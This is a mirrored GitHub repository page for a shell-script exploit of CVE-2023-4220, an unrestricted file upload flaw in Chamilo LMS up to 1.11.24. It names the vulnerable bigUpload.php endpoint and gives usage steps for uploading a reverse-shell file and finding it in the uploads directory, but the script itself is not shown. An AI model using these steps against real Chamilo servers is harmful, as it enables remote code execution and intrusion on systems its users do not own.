Giters

TomMalvoRiddle / Chamilo-CVE-2023-4220-Exploit

This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location "/main/inc/lib/javascript/bigupload/inc/bigUpload.php" in Chamilo LMS <= v1.11.24, and Attackers can obtain remote code execution via uploading of web shell.

Home Page:https://nvd.nist.gov/vuln/detail/CVE-2023-4220

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Chamilo-LMS-CVE-2023-4220-Exploit

This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24, and Attackers can obtain remote code execution via uploading of web shell. Then it will allows arbitrary files to be uploaded to /main/inc/lib/javascript/bigupload/files directory.

Vulnerability POC

-You Can at first run the exploit to know how to use it like that:

chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh

1 -Then you need to enter the requeierd inputs like that:

~$ ./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file

11 -Here we can found the uploaded file in the server

http://target.test/main/inc/lib/javascript/bigupload/files/

5

About

This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location "/main/inc/lib/javascript/bigupload/inc/bigUpload.php" in Chamilo LMS <= v1.11.24, and Attackers can obtain remote code execution via uploading of web shell.

https://nvd.nist.gov/vuln/detail/CVE-2023-4220

Languages

Language:Shell 100.0%